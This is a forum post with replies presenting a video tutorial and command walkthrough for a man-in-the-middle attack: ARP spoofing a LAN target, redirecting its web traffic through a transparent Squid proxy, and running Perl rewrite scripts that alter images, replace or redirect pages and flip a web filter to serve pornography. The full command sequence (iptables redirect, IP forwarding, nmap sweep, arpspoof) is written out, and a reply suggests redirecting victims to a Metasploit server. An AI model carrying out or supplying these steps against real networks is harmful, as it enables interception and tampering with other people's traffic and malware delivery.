[Video] Playing With Traffic (Squid)

[g0tmi1k]

Message from the author
Playing with traffic. Actually, it’s more along the lines of “URL Manipulation”; however that didn’t sound as “catchy”. I do plan to do another video on “Altering (web) content”, which would be more actuate in regards to “Playing with traffic”. This would be done using Squid (instead of using Ettercap) - and I’ve had some ideas for when I do this too.

This was posted on “April Fools” (The time for pranks and “gotchas”) and what seems to be a (harmless) “prank” is still an attack. This means you need permission to do it (just like everything else on this site!) - as you may capture/discover more than you planned. Like always, make sure you have permission, and, due to the content of one of these attacks, you need to make sure you don’t expose “minors”. On that note: you're on your own. What you do, is your doing. What you make happen is your responsibility. You have been warned.

And with all of that out-of-the-way…



Links
Download scripts: http://www.mediafire.com/?fp9a1j9mxtr1xx8
Download video: [I]http://www.mediafire.com/?a3umn4jyxh8fcgl
Watch video on-line: http://g0tmi1k.blip.tv/file/4960204

*If you wish to view only the effects of the attack or know how to setup Squid from before [1], skip to 03:40 in the video*

Brief Overview
There is more to “Man in the Middle” attacks than just getting/collecting/harvesting emails/passwords/cookies. For example, the attacker could manipulate & alter the target’s traffic to have some “malicious fun” (even though some scripts are “borderline childish”), to highlight the dangers of a “Man In The Middle” attack and what other abilities/options are available to the attacker. Below is a breakdown of the scripts demonstrated:

• asciiImages.pl ~ Converts images into ASCII art (www.msn.com)
• blurImages.pl ~ Makes images harder to see (www.flickr.com)
• flipImages.pl ~ Flips images vertical (www.google.com)
• flopImages.pl ~ Flips images vertically (www.google.com)
• googleSearch.pl ~ Modifies Google search queries (www.google.com)
• noInternet.pl ~ Replace every web site (www.bing.com)
• replaceImages.pl ~ Replace every image (www.ebay.com)
• replacePages.pl ~ Replace a selected site with ours (www.facebook.com)
• rickrollYoutube.pl ~ Redirect to a youtube video (www.twitter.com)
• timeMachine.pl ~ Uses archive.org archives (www.bbc.co.uk)
• touretteImages.pl ~ Add words to images (www.yahoo.com)
• fightClub.pl ~ Add images to images (www.imdb.com)
• allPornInternet.sh ~ Setup & “configure” dansguardian (www.google.com)

Requirements
* Nmap – Can be found in BackTrack 4-R2
* Squid – Can be found in the BackTrack repository
* Apache – Can be found in BackTrack 4-R2
* DansGuardian – Can be installed via allPornInternet.sh
* ARPSpoof – Part of the DSniff suite which can be found in the BackTrack 4-R2
* A Text Editor – Kate can be found in BackTrack 4-R2
* The collection of scripts – See “Links”



Method
* Start network services and obtain an IP address
* Download, install and configure Squid proxy
* Check the configuration and dependence for the script
* Set file & folder permissions
* Configure and perform a man in the middle attack
* Game Over
* Edit Squid configuration and restart service
* Game Over ...again
* Download & “configure” DansGuardian
* Restart Squid
* Game Over ...once more!



Walk-through
The attacker installs Squid3 cache proxy via the Operating System (Backtrack 4 R2) repository. Squid is the “backbone” to this attack and after configuring it to work on the Local Area Network (LAN) and to be transparent (the proxy “works” without any configuration to the browser), the attacker chooses which script to first try out (asciiImages.pl is the first one) and adds it to the configuration file.

The attacker then opens the script up to verify its location as well as any requirements, which in this case is ImageMagick, Ghostscript and jp2a. At the same time, the attacker checks the variables to match their local machine's configuration. For example, the attacker checks if:

• "$debug" mode is needed for any diagnostics reasons. ("1" = enabled, "0" = disabled. The log file is placed in /tmp/[scriptname]_debug.log)
• "$ourIP" matches the attacker's IP address. (ifconfig [interface])
• "$baseDir" is a local path for a folder that is accessible to the webserver and is writeable by "nobody" - as Squid is running at this user level and it executes the perl scripts. (Apache default web path is /var/www/. However the attacker creates a subfolder, "tmp/" to use)
• "$baseURL" would be the visible path for "$baseDir". (http://[ip]/anysubfolders)
• "$convert" , "$convert" and "$jp2a" are the paths to the necessarily programs (whereis [programsname])

Note: The variables depend on each script. The example above was taken from "asciiImages.pl".

After this, the attacker moves on to configure the files and folder permissions to allow the necessary daemons to be able to interact correctly. The daemons are then restarted to re-load the configuration files in the new environment. The last stage in preparing the attacker’s machine is to manage the ports, as the standard HTTP port for web traffic is on port 80, however Squid is running on 3128 on the attacker’s machine (and their web server, which is needed, is also on port 80). The attacker redirects the traffic into the proxy, therefore squid is used. This is achieved with iptables.

The attacker does a quick sweep of the network using nmap to check that the target is online. After they have been located, the attacker performs a MITM attack via ARP cache poisoning via arpspoof

Everything is now in place… Game over.

[g0tmi1k]

… However the attacker wishes to change scripts. So after stopping the attack (and correctly re-posing the ARP tables), the attacker edits Squid’s configuration file once more and modifies it to reflect the new script. After restarting the daemon once more, to load the new configuration, the attacker attacks once more with ARP cache poisoning. This process is done, until they have had enough.

… But this isn’t enough for the attacker. The attacker decides to install a “Web filter”. As the attacker has permission from the target to execute these attacks, the attacker has checked (and double checked) that the target is “of age” and is in an environment where “adult material” is “accepted”, they “reserve the logic” of DansGuardian. This means, what was “filtered” is now allowed; therefore what was allowed is now blocked.


Commands:

Code:

start-network
dhclient eth0

apt-cache search squid
apt-get -y install squid3
update-rc.d -f squid3 remove

kate -> Open: /etc/squid3/squid.conf
Edit (Line 588): acl localnet src 192.168.0.0/16
Edit (Line 644): http_access allow localnet
Edit (Line 868): http_port 3128 transparent
Add (Line: *end*): url_rewrite_program /root/asciiImages.pl
Save

kate -> Open: /root/asciiImages.pl
apt-get -y install imagemagick ghostscript jp2a
chmod 755 *pl
ls -l *pl

mkdir /var/www/tmp
cp -r www/* /var/www/tmp
chown nobody:nogroup /var/www/tmp
chmod 777 /var/www/tmp
/etc/init.d/apache2 restart
/etc/init.d/squid3 restart
clear

iptables -t nat -A PREROUTING -i eth0 -p tcp --destination-port 80 -j REDIRECT --to-port 3128
echo 1 > /proc/sys/net/ipv4/ip_forward
#cat /proc/sys/net/ipv4/ip_forward

nmap 192.168.0.0/24 -n -sn -sP

#Start -> run -> cmd -> arp -a
arpspoof -i eth0 -t 192.168.0.118 192.168.0.1
#Start -> run -> cmd -> arp -a

IE -> http://www.msn.com
######################################################################################
#Kill arpspoof
kate -> Open: /etc/squid3/squid.conf
Replace (Line: *end*): url_rewrite_program /root/blurImages.pl
Save
/etc/init.d/squid3 restart && arpspoof -i eth0 -t 192.168.0.118 192.168.0.1

IE -> http://www.flickr.com
######################################################################################
bash allPornInternet.sh       
/etc/init.d/squid3 restart && arpspoof -i eth0 -t 192.168.0.118 192.168.0.1
######################################################################################

Notes:
* Credit & thanks to Pete Stevens (http://www.ex-parrot.com/pete/) for inspiration with “Upside-down-ternet”.
* Credit & thanks to Charlie Vedaa & an “anonymous speaker” (prank-o-matic.com) as a lot of the scripts originated from them & their presentation at Defcon 17.
* You may have to edit the script, to change the default variables. For example, the default IP for the attackers IP is 192.168.0.33.
* I didn’t see a need to keep switching from the attacker/target on every script change, but you can see how it was done via “blurImage.pl”.
* Instead of doing a “rehearsal”, I went straight in with recording it (to try and save sometime), which resulted in a few things needed “tweaking”, hence the jumpiness of the video in places – I did my best to patch it together. This is the reason why a few images were loaded from cache, Internet history/Back-forward arrows were sometimes “wrong”.
* I like to keep my videos as short as possible (so they are “straight to the point”). However, this time around, I tried editing them in-time - to the (first) song at least!.
* The Virtual Machine I used to record the video in wasn’t that powerful hence it took “a while to process” on the target side.
* “Convert” which is used to manipulate images in a few scripts has been found to keep running after squid/script has been stopped, as a result using up processing power. If this happens: “killall convert” should kill it.
* Depending on how intently you watched the video, you might have seen a bash script to automate all of this… This will be released at a later date.
* This was my first time releasing something I’ve coded using perl. I’m sure it could be done “better” – but as the originals were done in PERL – I stuck with it.
* [1] This post is the first one I was referring to. =)

Song: Infected Mushroom - End Of The Road & Rick Astley - Never Gonna Give You Up & The Dust Brothers – Stealing Fat
Video length: 8:17
Capture length: 44:00
Blog Post: http://g0tmi1k.blogspot.com/2011/04/...fic-squid.html
Forum Post: http://www.backtrack-linux.org/forum...tml#post192949



~g0tmi1k

[akuj1n]

I modified a script of yours to do ettercap image filtering using console and it worked great, thanks a bunch g0tm1lk.

I actually asked in irc the other day if it was possible to host a metaspoit server and then user ettercap to force them to the server using filtering. Yes? no?

[spawn]

Great Post g0tmi1k

[sostentado]

Really awesome!!!

[m0j4h3d]

lol,,,nice post boy, gr8 tools to try, you gonna make victims got crazy
gd work
keep it

[kataibrengsek]

i really like all of yr video's

very interesting n easy to learn it

[comaX]

Actually lol'd to xzibit. Very nice video, thanks !

[svalluke]

amazing g0tmi1k.... this is perfect

[g0tmi1k]

I modified a script of yours to do ettercap image filtering using console and it worked great, thanks a bunch g0tm1lk.

I actually asked in irc the other day if it was possible to host a metaspoit server and then user ettercap to force them to the server using filtering. Yes? no?

For the record, Perl is a little different to ettercap filters.

You can use replaceImages.pl for image replacement using squid instead of ettercap
and regards about "metasploit server" you can use either noInternet.pl (Replace every web site), or replacePages.pl (Replace a selected site). They should redirct the target to whatever site/page you wish for them to visit.
Otherwise I did a another video (that uses ettercap), to inject a iFrame which could be linked back to metasploit allowing for client side attackes: http://www.backtrack-linux.org/forum...r_autopwn.html

Great Post g0tmi1k

Really awesome!!!

lol,,,nice post boy, gr8 tools to try, you gonna make victims got crazy
gd work
keep it

i really like all of yr video's

very interesting n easy to learn it

Actually lol'd to xzibit. Very nice video, thanks !

amazing g0tmi1k.... this is perfect

Thanks for the thanks! =)
Cheers for the feedback everyone. =D